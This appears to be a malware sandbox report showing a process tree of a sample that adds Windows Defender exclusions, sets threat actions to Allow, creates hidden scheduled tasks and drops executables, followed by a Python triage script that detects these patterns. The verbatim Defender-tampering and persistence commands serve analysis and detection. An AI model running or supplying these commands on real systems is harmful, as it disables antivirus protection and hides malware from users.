C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;" | tree level 2
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32 | tree level 4
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gVDRwbqLW" /SC once /ST 00:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | tree level 2
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gVDRwbqLW" | tree level 2
-
C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /4 | tree level 1
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | tree level 1
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | tree level 2
-
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc | tree level 1
-
C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam | tree level 1
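The tree above shows the same Defender-tampering pattern three times: REG ADD chains wrapped in forfiles, cmd /C or powershell, written to both the 32-bit and 64-bit policy views, followed by a scheduled task that runs gpupdate /force from an encoded command, and a second task that runs the dropped payload as SYSTEM from %TEMP%. The helper below is an added example, not code from the sandbox report or from the sample; it parses command lines of exactly this shape. It splits chained REG ADD operations out of the wrappers, classifies the Defender policy keys they touch (Exclusions\Paths, Exclusions\Extensions, Spynet\SpyNetReporting, Threats\ThreatIDDefaultAction, where data 6 is the Allow action), decodes -EncodedCommand payloads (base64 of UTF-16LE) and flags schtasks /CREATE lines that run as SYSTEM or whose action sits in a temp or ProgramData directory. The tag names and function names are my own; the sample command lines are copied from the tree.

```python
# Added triage example; not code from the sandbox report or the sample it analyses.
import base64
import re

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
# Numeric data written under Threats\ThreatIDDefaultAction; 6 means "Allow".
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}
REG_FLAGS = {"/v": "value", "/t": "type", "/d": "data"}
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')                       # quoted run or bare word
_REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\s+(.*)', re.I)
_SPLIT = re.compile(r'\s*[;&]+\s*(?=reg(?:\.exe)?"?\s+add\b)', re.I)
_ENC = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})', re.I)


def parse_reg_adds(cmdline):
    """Every REG ADD in one command line, also those chained with '&' or ';' in a wrapper."""
    ops = []
    for segment in _SPLIT.split(cmdline.replace('\\"', '"')):  # nested quotes arrive as \"
        m = _REG_ADD.search(segment)
        if not m:
            continue
        rest = m.group(1).strip()
        if rest.count('"') % 2:                  # a dangling quote closes the wrapper
            rest = rest.rstrip('"')
        toks = [q or u for q, u in _TOKEN.findall(rest.rstrip(';& '))]
        if not toks:
            continue
        op = {"key": toks[0], "value": None, "type": None, "data": None, "view": "default"}
        i = 1
        while i < len(toks):
            flag = toks[i].lower()
            if flag in REG_FLAGS and i + 1 < len(toks):
                op[REG_FLAGS[flag]] = toks[i + 1]
                i += 1
            elif flag.startswith("/reg:"):       # /reg:32 or /reg:64 registry view
                op["view"] = flag[5:]
            i += 1                               # /f and unknown switches fall through
        ops.append(op)
    return ops


def classify(op):
    """Name the Defender policy change a REG ADD makes; None if it is unrelated."""
    key = op["key"].lower()
    if not key.startswith(DEFENDER_POLICY):
        return None
    sub, val, data = key[len(DEFENDER_POLICY):], (op["value"] or "").lower(), op["data"]
    if sub.startswith("\\exclusions\\"):          # Paths, Extensions, Processes
        return "exclusion_" + sub.rsplit("\\", 1)[1]
    if sub == r"\spynet" and val == "spynetreporting" and data == "0":
        return "maps_reporting_disabled"
    if sub == r"\threats\threatiddefaultaction":
        return "threat_default_" + THREAT_ACTIONS.get(data, "unknown").lower()
    return "other_defender_policy"


def decode_encoded_command(cmdline):
    """Decode a powershell -EncodedCommand / -enc / -e payload (base64 of UTF-16LE)."""
    m = _ENC.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def parse_schtasks(cmdline):
    """Name, run-as account and action of a 'schtasks /CREATE' line, with risk flags."""
    if not re.search(r'\bschtasks(?:\.exe)?"?\s.*?/create\b', cmdline, re.I):
        return None
    def opt(flag):                               # /TR "\"quoted.exe\" args" keeps escapes
        m = re.search(r'/' + flag + r'\s+(?:"((?:\\"|[^"])*)"|(\S+))', cmdline, re.I)
        return m and (m.group(1) if m.group(1) is not None else m.group(2)).replace('\\"', '"')
    task = {"name": opt("tn"), "run_as": opt("ru"), "action": opt("tr") or "", "flags": []}
    if (task["run_as"] or "").lower() == "system":
        task["flags"].append("runs_as_system")
    if re.search(r'\\(?:appdata\\local\\temp|windows\\temp|programdata)\\', task["action"], re.I):
        task["flags"].append("action_in_temp")
    task["decoded"] = decode_encoded_command(task["action"])
    return task


def triage(cmdlines):
    """Fold process command lines into deduplicated findings."""
    report, seen = {"defender": [], "encoded": [], "tasks": []}, set()
    for line in cmdlines:
        for op in parse_reg_adds(line):
            tag = classify(op)
            if tag and (tag, op["value"], op["view"]) not in seen:
                seen.add((tag, op["value"], op["view"]))
                report["defender"].append(dict(op, tag=tag))
        decoded = decode_encoded_command(line)
        if decoded and decoded not in report["encoded"]:
            report["encoded"].append(decoded)
        task = parse_schtasks(line)
        if task:
            report["tasks"].append(task)
    return report


# Constructed sample input: command lines copied from the process tree above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;"',
    r'schtasks /CREATE /TN "gOonaGCFB" /SC once /ST 11:24:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 21:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe\" DF /site_id 690689 /S" /V1 /F',
]
```

Feed `triage()` the CommandLine field of Sysmon event 1 or Security 4688 records and it reports six Defender policy writes for the sample (two extension exclusions, MAPS reporting off, one threat ID set to Allow, two path exclusions), the decoded gpupdate command, and the SYSTEM task whose action lives under %TEMP%. On a live host the same keys can be checked with `reg query` against both views and `Get-MpPreference` (ExclusionPath, ExclusionExtension, ThreatIDDefaultAction_Ids and _Actions), which is the quickest way to confirm the policy actually took effect after the forced gpupdate.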
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe (2.5MB)
- C:\Program Files (x86)\ImageComparer\IC329.exe (5.1MB)
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (2KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (64B)
- C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe (1.7MB)
- C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe (6.8MB)
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efb1apwq.k1s.ps1 (60B)
- C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe (6.8MB; same hashes as 71r9O7Y9zIfGXmeBiL.exe)
- C:\Users\Admin\AppData\Local\Temp\is-0DASG.tmp\is-75BBU.tmp (656KB)
- C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_iscrypt.dll (2KB)
- C:\Users\Admin\AppData\Local\Temp\is-9CJVH.tmp\_isetup\_isdecmp.dll (13KB)
- C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp (659KB)
- C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp (658KB)
- C:\Users\Admin\AppData\Local\Temp\is-OV7IN.tmp\_isetup\_iscrypt.dll (2KB)
- C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe (2.5MB)
- C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\_isetup\_iscrypt.dll (2KB)
- C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\_isetup\_isdecmp.dll (13KB)
- C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\_isetup\_shfoldr.dll (22KB)
- C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe (2.1MB)
- C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe (1.3MB)
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (1KB)
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (11KB)
- C:\Windows\system32\GroupPolicy\gpt.ini (268B)